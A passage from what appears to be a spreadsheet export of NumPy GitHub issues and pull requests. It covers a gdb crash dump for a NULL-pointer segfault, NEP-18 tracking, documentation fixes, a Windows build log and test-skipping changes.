RBX: 0x0 _x000D_
RCX: 0x0 _x000D_
RDX: 0xffffdad7614 --&gt; 0x0 _x000D_
RSI: 0x2 _x000D_
RDI: 0xc03700 --&gt; 0x24c3 _x000D_
RBP: 0x7fffed6bb0a0 --&gt; 0x3 _x000D_
RSP: 0x7fffffffcf30 --&gt; 0xffffffff9ec --&gt; 0x0 _x000D_
RIP: 0x7ffff2803769 (&lt;PyArray_ConvertToCommonType+1865&gt;:	add    QWORD PTR [rbx],0x1)_x000D_
R8 : 0x501 _x000D_
R9 : 0x7ffff3ac653d --&gt; 0xfff7eafeb000006e _x000D_
R10: 0x5 _x000D_
R11: 0x7fffffffce30 --&gt; 0xbe90a0 --&gt; 0xb ('\x0b')_x000D_
R12: 0x0 _x000D_
R13: 0x60200000bab0 --&gt; 0x0 _x000D_
R14: 0x0 _x000D_
R15: 0x0_x000D_
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)_x000D_
[-------------------------------------code-------------------------------------]_x000D_
   0x7ffff2803755 &lt;PyArray_ConvertToCommonType+1845&gt;:	je     0x7ffff28039f0 &lt;PyArray_ConvertToCommonType+2512&gt;_x000D_
   0x7ffff280375b &lt;PyArray_ConvertToCommonType+1851&gt;:	cmp    BYTE PTR [r15+0x7fff8000],0x0_x000D_
   0x7ffff2803763 &lt;PyArray_ConvertToCommonType+1859&gt;:	jne    0x7ffff2804188 &lt;PyArray_ConvertToCommonType+4456&gt;_x000D_
=&gt; 0x7ffff2803769 &lt;PyArray_ConvertToCommonType+1865&gt;:	add    QWORD PTR [rbx],0x1_x000D_
   0x7ffff280376d &lt;PyArray_ConvertToCommonType+1869&gt;:	xor    ecx,ecx_x000D_
   0x7ffff280376f &lt;PyArray_ConvertToCommonType+1871&gt;:	xor    r9d,r9d_x000D_
   0x7ffff2803772 &lt;PyArray_ConvertToCommonType+1874&gt;:	xor    edx,edx_x000D_
   0x7ffff2803774 &lt;PyArray_ConvertToCommonType+1876&gt;:	mov    rsi,rbx_x000D_
[------------------------------------stack-------------------------------------]_x000D_
0000| 0x7fffffffcf30 --&gt; 0xffffffff9ec --&gt; 0x0 _x000D_
0008| 0x7fffffffcf38 --&gt; 0x7fffffffd040 --&gt; 0x7fff00000002 _x000D_
0016| 0x7fffffffcf40 --&gt; 0x7ffff3ace0b0 --&gt; 0x1 _x000D_
0024| 0x7fffffffcf48 --&gt; 0x7fff00000005 _x000D_
0032| 0x7fffffffcf50 --&gt; 0x60200000bab0 --&gt; 0x0 _x000D_
0040| 0x7fffffffcf58 --&gt; 0x0 _x000D_
0048| 0x7fffffffcf60 --&gt; 0x100000002 --&gt; 0x0 _x000D_
0056| 0x7fffffffcf68 --&gt; 0x7fffed70f210 --&gt; 0x2 _x000D_
[------------------------------------------------------------------------------]_x000D_
Legend: code, data, rodata, value_x000D_
Stopped reason: SIGSEGV_x000D_
0x00007ffff2803769 in PyArray_ConvertToCommonType (op=op@entry=0x7ffff3ace0b0, retn=retn@entry=0x7fffffffd040) at numpy/core/src/multiarray/convert_datatype.c:2135_x000D_
2135	numpy/core/src/multiarray/convert_datatype.c: No such file or directory._x000D_
gdb-peda$ bt_x000D_
#0  0x00007ffff2803769 in PyArray_ConvertToCommonType (op=op@entry=0x7ffff3ace0b0, retn=retn@entry=0x7fffffffd040) at numpy/core/src/multiarray/convert_datatype.c:2135_x000D_
#1  0x00007ffff28d3ed3 in PyArray_Choose (ip=ip@entry=0x7fffedb85c10, op=0x7ffff3ace0b0, out=0x0, clipmode=&lt;optimized out&gt;) at numpy/core/src/multiarray/item_selection.c:671_x000D_
#2  0x00007ffff294f51d in array_choose (self=&lt;optimized out&gt;, args=0x7ffff3ace0b0, kwds=0x0) at numpy/core/src/multiarray/methods.c:1124_x000D_
#3  0x000000000046da0e in cfunction_call_varargs (kwargs=&lt;optimized out&gt;, args=&lt;optimized out&gt;, func=0x7fffedb90380) at Objects/call.c:753_x000D_
#4  PyCFunction_Call (func=0x7fffedb90380, args=&lt;optimized out&gt;, kwargs=&lt;optimized out&gt;) at Objects/call.c:784_x000D_
#5  0x00007ffff29c333b in gentype_generic_method (self=&lt;optimized out&gt;, args=0x7ffff3ace0b0, kwds=0x0, str=&lt;optimized out&gt;) at numpy/core/src/multiarray/scalartypes.c.src:187_x000D_
#6  0x000000000046b310 in _PyMethodDef_RawFastCallKeywords (method=0x7ffff2cffde0 &lt;gentype_methods+832&gt;, self=self@entry=0x7ffff00cec78, args=args@entry=0x7ffff7eb11b8, nargs=nargs@entry=0x2, _x000D_
    kwnames=kwnames@entry=0x0) at Objects/call.c:690_x000D_
#7  0x000000000081403d in _PyMethodDescr_FastCallKeywords (descrobj=descrobj@entry=0x7ffff3a452c0, args=args@entry=0x7ffff7eb11b0, nargs=nargs@entry=0x3, kwnames=kwnames@entry=0x0)_x000D_
    at Objects/descrobject.c:288_x000D_
#8  0x00000000004416b2 in call_function (kwnames=0x0, oparg=0x3, pp_stack=&lt;synthetic pointer&gt;) at Python/ceval.c:4600_x000D_
#9  _PyEval_EvalFrameDefault (f=&lt;optimized out&gt;, throwflag=&lt;optimized out&gt;) at Python/ceval.c:3186_x000D_
#10 0x00000000005ecfbc in PyEval_EvalFrameEx (throwflag=0x0, f=0x7ffff7eb1040) at Python/ceval.c:536_x000D_
#11 _PyEval_EvalCodeWithName (_co=_co@entry=0x7ffff7eb7b70, globals=globals@entry=0x7ffff7eb11a8, locals=locals@entry=0x7ffff7eb7bc8, args=args@entry=0x0, argcount=argcount@entry=0x0, _x000D_
    kwnames=kwnames@entry=0x0, kwargs=0x0, kwcount=0x0, kwstep=0x2, defs=0x0, defcount=0x0, kwdefs=0x0, closure=0x0, name=0x0, qualname=0x0) at Python/ceval.c:3951_x000D_
#12 0x00000000005ed4d3 in PyEval_EvalCodeEx (closure=0x0, kwdefs=0x0, defcount=0x0, defs=0x0, kwcount=0x0, kws=0x0, argcount=0x0, args=0x0, locals=locals@entry=0x7ffff7eb7bc8, _x000D_
    globals=globals@entry=0x7ffff7eb11a8, _co=_co@entry=0x7ffff7eb7b70) at Python/ceval.c:3980_x000D_
#13 PyEval_EvalCode (co=co@entry=0x7ffff7eb7b70, globals=globals@entry=0x7ffff7ef6080, locals=locals@entry=0x7ffff7ef6080) at Python/ceval.c:513_x000D_
#14 0x0000000000687cdd in run_mod (arena=0x7ffff7f72078, flags=0x7fffffffda60, locals=0x7ffff7ef6080, globals=0x7ffff7ef6080, filename=0x7ffff7e6cb90, mod=0x625000020ce0) at Python/pythonrun.c:1031_x000D_
#15 PyRun_FileExFlags (fp=&lt;optimized out&gt;, filename_str=&lt;optimized out&gt;, start=&lt;optimized out&gt;, globals=&lt;optimized out&gt;, locals=&lt;optimized out&gt;, closeit=&lt;optimized out&gt;, flags=0x7fffffffda60)_x000D_
    at Python/pythonrun.c:984_x000D_
#16 0x000000000068817b in PyRun_SimpleFileExFlags (fp=&lt;optimized out&gt;, filename=0x7ffff7e88f50 "poc2.py", closeit=0x1, flags=&lt;optimized out&gt;) at Python/pythonrun.c:425_x000D_
#17 0x000000000044d9a4 in pymain_run_file (config=0x61e00000f108, cf=0x7fffffffda60, pymain=0x7fffffffdc60) at Modules/main.c:1159_x000D_
#18 pymain_run_python (interp=0x61e00000f080, pymain=0x7fffffffdc60) at Modules/main.c:1607_x000D_
#19 pymain_main (pymain=pymain@entry=0x7fffffffdc60) at Modules/main.c:1755_x000D_
#20 0x000000000044e39c in _Py_UnixMain (argc=0x2, argv=0x7fffffffdde8) at Modules/main.c:1792_x000D_
#21 0x00007ffff6193830 in __libc_start_main (main=0x424060 &lt;main&gt;, argc=0x2, argv=0x7fffffffdde8, init=&lt;optimized out&gt;, fini=&lt;optimized out&gt;, rtld_fini=&lt;optimized out&gt;, stack_end=0x7fffffffddd8)_x000D_
    at ../csu/libc-start.c:291_x000D_
#22 0x0000000000446229 in _start ()_x000D_
```_x000D_
_x000D_
numpy.version.version_x000D_
'1.15.2'_x000D_
_x000D_
Python 3.8.0a0 (heads/master:f6c8007, Sep 25 2018, 12:42:29) _x000D_
[GCC 5.4.0 20160609] on linux</t>
  </si>
  <si>
    <t>Segmentation fault PyArray_ConvertToCommonType.(NULL pointer derference)</t>
  </si>
  <si>
    <t>DOC: use "import numpy as np" style</t>
  </si>
  <si>
    <t>- [x] Core functionality for supporting overrides:_x000D_
   - [x] Initial implementation in pure Python (#12005)_x000D_
   - [x] Validate dispatcher functions in array_function_dispatch (https://github.com/numpy/numpy/pull/12099)_x000D_
       - ~~Disable validation when not testing NumPy (if there is a measurable impact on import times)~~ (unnecessary)_x000D_
   - [x] Add a `.__skip_array_function__` function attribute to allow for skipping `__array_function__` dispatch. (https://github.com/numpy/numpy/pull/13389)_x000D_
- [x] Reimplement parts of `numpy/core/overrides.py` in C for speed (https://github.com/numpy/numpy/issues/12028):_x000D_
    - [x] `get_overloaded_types_and_args`_x000D_
    - [x] `array_function_implementation_or_override`_x000D_
    - [x] `ndarray.__array_function__`?_x000D_
    - [x] `array_function_dispatch`?_x000D_
- [x] Support overrides for all public NumPy functions_x000D_
    - [x] `numpy.core`_x000D_
        - [x] the easy part (https://github.com/numpy/numpy/pull/12115)_x000D_
        - [x] `np.core.defchararray` (#12154)_x000D_
        - [x] `np.einsum` and `np.block` (https://github.com/numpy/numpy/pull/12163)_x000D_
    - [x] `numpy.lib`_x000D_
        - [x] part 1 (https://github.com/numpy/numpy/pull/12116)_x000D_
        - [x] part 2 (#12119)_x000D_
    - [x] `numpy.fft`/`numpy.linalg` (https://github.com/numpy/numpy/pull/12117)_x000D_
    - [x] functions [currently written entirely in C](https://github.com/numpy/numpy/blob/dab3fb6508d84b2b0cda9fd6529d935b04e89d4e/numpy/core/src/multiarray/multiarraymodule.c#L4195): empty_like, concatenate, inner, where, lexsort, can_cast, min_scalar_type, result_type, dot, vdot, is_busday, busday_offset, busday_count, datetime_as_string (https://github.com/numpy/numpy/pull/12175)_x000D_
    - [x] linspace_x000D_
    - [ ] [`arange?`](https://github.com/numpy/numpy/issues/12379)_x000D_
- [x] Usability improvements_x000D_
    - [x] [better error message](https://github.com/numpy/numpy/issues/12213) for unimplemented functions (https://github.com/numpy/numpy/pull/12251)_x000D_
    - [x] `ndarray.__repr__` should not rely on `__array_function__` (https://github.com/numpy/numpy/pull/12212)_x000D_
    - [x] `stacklevel` should be increased by 1 for wrapped functions, so tracebacks point to the right place (gh-13329)_x000D_
- [x] Fix all known bugs / downstream test failures_x000D_
    - [x] pandas test failures: https://github.com/pandas-dev/pandas/issues/23172_x000D_
    - [x] dask test failures: array_function_dispatch() breaks inspect.getargspec/getfullargspec #12225_x000D_
    - [x] scipy test failures: hstack and column_stack [no longer accept generators](https://github.com/numpy/numpy/issues/12263)_x000D_
- [ ] Documentation_x000D_
    - [x] Release notes (#12028)_x000D_
    - [x] Narrative docs_x000D_
    - [ ] Revised docstrings to clarify overloaded arguments?</t>
  </si>
  <si>
    <t>Tracking issue for implementation of NEP-18 (__array_function__)</t>
  </si>
  <si>
    <t>Some more undocumented docstrings listed in #10106, for the intermediate, abstract types in the scalar type hierarchy (see https://docs.scipy.org/doc/numpy/reference/arrays.scalars.html).</t>
  </si>
  <si>
    <t>DOC: Add docstrings for abstract types in scalar type hierarchy</t>
  </si>
  <si>
    <t xml:space="preserve">Proposal to replace "leave the value in the output alone" by "leave the value unchanged in the output", and to add more detail about the origin of the unchanged value (especially indicating that if no `out` location is given, the array freshly-allocated by the ufunc is uninitialized)._x000D_
_x000D_
This commit is related to ticket #12022._x000D_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</si>
  <si>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add detail for 'where' argument in ufunc</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.core', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>MAINT: Normalize axes the normal way in fftpack.py</t>
  </si>
  <si>
    <t xml:space="preserve">* Add doc/changelog/1.14.6-changelog.rst_x000D_
* Add doc/changelog/1.15.2-changelog.rst_x000D_
* Add doc/release/1.14.6-notes.rst_x000D_
* Add doc/release/1.15.2-notes.rst_x000D_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</si>
  <si>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Post NumPy 1.15.2 release updates.[ci skip]</t>
  </si>
  <si>
    <t>TST: Add tests for np.sctype2char</t>
  </si>
  <si>
    <t>Also bump copyright year_x000D_
_x000D_
[ci skip]_x000D_
_x000D_
Comments: https://github.com/numpy/numpy/pull/12017#pullrequestreview-157918557</t>
  </si>
  <si>
    <t xml:space="preserve">DOC: MAINT: address comments @eric-wieser on NEP 24-26 PR.  </t>
  </si>
  <si>
    <t>MAINT: Simplify parts of `_type_aliases`</t>
  </si>
  <si>
    <t>As proposed on the mailing list. I changed formatting and replaced a few links to gists/branches with references to other NEPs. And added a *Context* sentence at the start of each NEP. No other content changes._x000D_
_x000D_
Also fixes gh-11617, so one can actually build the neps site locally without having to have graphviz installed.</t>
  </si>
  <si>
    <t>NEP: add 3 missing data NEPs rescued from 2011-2012</t>
  </si>
  <si>
    <t xml:space="preserve">I was running the the command from the install.rst.txt in Basic Installation inside the Anaconda Prompt. I have Visual Studio Build Tools installed and my python version I'm using is 3.6 and in a x64 bit. All this for the error, I got about the mtrand.pyx Value Error: a must be non-empty which was involved with me using np.random.choice. I ask your help cause it was said in other issues is to fix numpy but I didnt know it would involve to like download this entire repository. Help me please bit of a beginner._x000D_
_x000D_
This was the command:_x000D_
```_x000D_
python setup.py build -j 4 install --prefix $%HOME%/.local_x000D_
```_x000D_
_x000D_
It produced this error message._x000D_
```_x000D_
Running from numpy source directory._x000D_
Cythonizing sources_x000D_
numpy/random\mtrand\randint_helpers.pxi.in has not changed_x000D_
numpy/random\mtrand\mtrand.pyx has not changed_x000D_
blas_opt_info:_x000D_
blas_mkl_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries mkl_rt not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
blis_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries blis not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
openblas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries openblas not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
get_default_fcompiler: matching types: '['gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95', 'intelvem', 'intelem', 'flang']'_x000D_
customize GnuFCompiler_x000D_
Could not locate executable g77_x000D_
Could not locate executable f77_x000D_
customize IntelVisualFCompiler_x000D_
Could not locate executable ifort_x000D_
Could not locate executable ifl_x000D_
customize AbsoftFCompiler_x000D_
Could not locate executable f90_x000D_
customize CompaqVisualFCompiler_x000D_
Could not locate executable DF_x000D_
customize IntelItaniumVisualFCompiler_x000D_
Could not locate executable efl_x000D_
customize Gnu95FCompiler_x000D_
Could not locate executable gfortran_x000D_
Could not locate executable f95_x000D_
customize G95FCompiler_x000D_
Could not locate executable g95_x000D_
customize IntelEM64VisualFCompiler_x000D_
customize IntelEM64TFCompiler_x000D_
Could not locate executable efort_x000D_
Could not locate executable efc_x000D_
customize PGroupFlangCompiler_x000D_
Could not locate executable flang_x000D_
don't know how to compile Fortran code on platform 'nt'_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_3_10_blas_threads_info:_x000D_
Setting PTATLAS=ATLAS_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries tatlas not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_3_10_blas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries satlas not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_blas_threads_info:_x000D_
Setting PTATLAS=ATLAS_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries ptf77blas,ptcblas,atlas not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_blas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries f77blas,cblas,atlas not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
accelerate_info:_x000D_
  NOT AVAILABLE_x000D_
_x000D_
F:\Anaconda\numpy-master\numpy-master\numpy\distutils\system_info.py:626: UserWarning:_x000D_
    Atlas (http://math-atlas.sourceforge.net/) libraries not found._x000D_
    Directories to search for the libraries can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [atlas]) or by setting_x000D_
    the ATLAS environment variable._x000D_
  self.calc_info()_x000D_
blas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries blas not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
F:\Anaconda\numpy-master\numpy-master\numpy\distutils\system_info.py:626: UserWarning:_x000D_
    Blas (http://www.netlib.org/blas/) libraries not found._x000D_
    Directories to search for the libraries can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [blas]) or by setting_x000D_
    the BLAS environment variable._x000D_
  self.calc_info()_x000D_
blas_src_info:_x000D_
  NOT AVAILABLE_x000D_
_x000D_
F:\Anaconda\numpy-master\numpy-master\numpy\distutils\system_info.py:626: UserWarning:_x000D_
    Blas (http://www.netlib.org/blas/) sources not found._x000D_
    Directories to search for the sources can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [blas_src]) or by setting_x000D_
    the BLAS_SRC environment variable._x000D_
  self.calc_info()_x000D_
  NOT AVAILABLE_x000D_
_x000D_
non-existing path in 'numpy\\distutils': 'site.cfg'_x000D_
lapack_opt_info:_x000D_
lapack_mkl_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries mkl_rt not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
openblas_lapack_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries openblas not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
openblas_clapack_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries openblas,lapack not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_3_10_threads_info:_x000D_
Setting PTATLAS=ATLAS_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries tatlas,tatlas not found in F:\Anaconda\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in F:\Anaconda\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries tatlas,tatlas not found in C:\_x000D_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tatlas,tatlas not found in F:\Anaconda\libs_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in F:\Anaconda\libs_x000D_
&lt;class 'numpy.distutils.system_info.atlas_3_10_threads_info'&gt;_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_3_10_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries satlas,satlas not found in F:\Anaconda\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in F:\Anaconda\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries satlas,satlas not found in C:\_x000D_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satlas,satlas not found in F:\Anaconda\libs_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in F:\Anaconda\libs_x000D_
&lt;class 'numpy.distutils.system_info.atlas_3_10_info'&gt;_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_threads_info:_x000D_
Setting PTATLAS=ATLAS_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries ptf77blas,ptcblas,atlas not found in F:\Anaconda\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in F:\Anaconda\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries ptf77blas,ptcblas,atlas not found in C:\_x000D_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ptf77blas,ptcblas,atlas not found in F:\Anaconda\libs_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in F:\Anaconda\libs_x000D_
&lt;class 'numpy.distutils.system_info.atlas_threads_info'&gt;_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries f77blas,cblas,atlas not found in F:\Anaconda\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in F:\Anaconda\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries f77blas,cblas,atlas not found in C:\_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in C:\_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries f77blas,cblas,atlas not found in F:\Anaconda\libs_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in F:\Anaconda\libs_x000D_
&lt;class 'numpy.distutils.system_info.atlas_info'&gt;_x000D_
  NOT AVAILABLE_x000D_
_x000D_
lapack_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack not found in ['F:\\Anaconda\\lib', 'C:\\', 'F:\\Anaconda\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
F:\Anaconda\numpy-master\numpy-master\numpy\distutils\system_info.py:626: UserWarning:_x000D_
    Lapack (http://www.netlib.org/lapack/) libraries not found._x000D_
    Directories to search for the libraries can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [lapack]) or by setting_x000D_
    the LAPACK environment variable._x000D_
  self.calc_info()_x000D_
lapack_src_info:_x000D_
  NOT AVAILABLE_x000D_
_x000D_
F:\Anaconda\numpy-master\numpy-master\numpy\distutils\system_info.py:626: UserWarning:_x000D_
    Lapack (http://www.netlib.org/lapack/) sources not found._x000D_
    Directories to search for the sources can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [lapack_src]) or by setting_x000D_
    the LAPACK_SRC environment variable._x000D_
  self.calc_info()_x000D_
  NOT AVAILABLE_x000D_
```_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils</t>
  </si>
  <si>
    <t>['53 - Invalid', 'component: build']</t>
  </si>
  <si>
    <t>Related to https://github.com/numpy/numpy/pull/12005#issuecomment-423682308 and https://github.com/numpy/numpy/pull/11915#issuecomment-419732811_x000D_
_x000D_
@seberg seems to be familiar with some of the details -- in particular, it seems to really just be this one test, `test_suppress_warnings_module `, that is process and / or thread unstable lately, apparently because of a call to `assert_warn_len_equal`_x000D_
_x000D_
I've created a [gist with a script](https://gist.github.com/tylerjereddy/b36bc44b4047245d9ba92a663c746246) that repeats the problematic test module on 4 cores 20 times and parses the output statistics._x000D_
_x000D_
On a clean build of latest master (6f0a0fafdd0) for me locally, `python warning_probe.py`:_x000D_
```_x000D_
pass_counts 5_x000D_
fail_counts 15_x000D_
trials 20_x000D_
```_x000D_
Same script with this branch:_x000D_
```_x000D_
pass_counts 20_x000D_
fail_counts 0_x000D_
trials 20_x000D_
```_x000D_
_x000D_
That looks promising I suppose?</t>
  </si>
  <si>
    <t>TST: improve warnings parallel test safety</t>
  </si>
  <si>
    <t>Fixes #12013._x000D_
_x000D_
Before this PR usage of `SkipTest()` would lead to skip output like this: `SKIP [11] /home/treddy/miniconda2/envs/numpy_dev_py3/lib/python3.6/site-packages/_pytest/nose.py:24: No French locale available`_x000D_
_x000D_
We now avoid the `pytest` `nose / unittest` compatbility layer for test skipping, which allows us to get a better trace of the test skip location:_x000D_
- `SKIP [10] /mnt/c/Users/treddy/github_projects/numpy/build/testenv/lib/python3.6/site-packages/numpy/core/tests/_locales.py:65: No French locale available`_x000D_
- `SKIP [1] /mnt/c/Users/treddy/github_projects/numpy/build/testenv/lib/python3.6/site-packages/numpy/core/tests/_locales.py:73: No French locale available`_x000D_
_x000D_
Can test locally with explicit skip output using i.e., `python runtests.py --mode=full -- -n 3 -rsx`, and a similar command in shippable is used on master so that should be updated on this branch with new trace to line location._x000D_
_x000D_
Also, reduce confusion regarding routing through  `nose.py`._x000D_
_x000D_
Not a complete removal of `SkipTest()` because there seems to be some nose compatibility stuff of our own related to decorators, which looks harder to migrate, if we want to at all for that._x000D_
_x000D_
While many of the changes are minor, there may be a preference to split into smaller PRs on i.e., a per-file basis.</t>
  </si>
  <si>
    <t>TST: prefer pytest.skip() over SkipTest</t>
  </si>
  <si>
    <t>As discussed in #11898, the pytest-packaged compatibility layer in `_pytest/nose.py` will capture any tests skipped using non-pytest infrastructure (including `unittest`) and route it through the `nose.py` compatibility layer for test skipping, which has caused some confusion in test reports (you can see the skips with "nose" paths in the shippable tests on master branch)._x000D_
_x000D_
from `get_skip_exceptions()` in above pytest module:_x000D_
_x000D_
```Python_x000D_
for module_name in ('unittest', 'unittest2', 'nose'):_x000D_
    mod = sys.modules.get(module_name)_x000D_
    if hasattr(mod, 'SkipTest'):_x000D_
..._x000D_
```_x000D_
_x000D_
To be fair, `nose` also has SkipTest so that may have been the most straightforward way for them to handle it. As Chuck notes, we may want to use i.e., `pytest.skip` to reduce confusion.</t>
  </si>
  <si>
    <t>TST, MAINT: skipping with pytest instead of unittest</t>
  </si>
  <si>
    <t xml:space="preserve">This is a straight copy-paste, followed by a docstring and some imports._x000D_
Note that we have to leave all the old imports in place to preserve the public API, even though they are no longer used._x000D_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</si>
  <si>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Extract the crazy number of type aliases to their own file</t>
  </si>
  <si>
    <t xml:space="preserve">Follow up on #11161. _x000D_
In order to enable no-copy pickling as mentioned in the [PEP 574 proposal](https://www.python.org/dev/peps/pep-0574),_x000D_
numpy arrays need to have:_x000D_
* a `__reduce_ex__` method, returning metadata and a buffer on their internal data_x000D_
* a method that reconstructs an array from a buffer, a `dtype`  and a `shape` _x000D_
_x000D_
_x000D_
The first one is mostly inspired from the `array_reduce` method in `core/src/multiarray/methods.c` _x000D_
_x000D_
The second one is a wrapper written in python around `np.frombuffer(..).reshape(..)` _x000D_
_x000D_
Here is the decrease in peak memory and cpu time: _x000D_
![results_c14eb6060b70ec1786bd869ef0879c8b0c8c6df8](https://user-images.githubusercontent.com/18555600/46150204-569a2800-c26c-11e8-809e-0b1b27c82cc4.png)_x000D_
_x000D_
_x000D_
pinging @ogrisel and @pitrou as of now. </t>
  </si>
  <si>
    <t>ENH: implementation of array_reduce_ex</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.core', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>Follows on from and closes #12007. CI should show travis + appveyor passing on both commits below to prove that the removed code was never used.</t>
  </si>
  <si>
    <t xml:space="preserve"> MAINT: Eliminate the private `numerictypes._typestr`</t>
  </si>
  <si>
    <t xml:space="preserve">Super minor, but part of larger cleanup I'm trying to do to `numerictypes`_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Reassociate `np.cast` with the comment describing it</t>
  </si>
  <si>
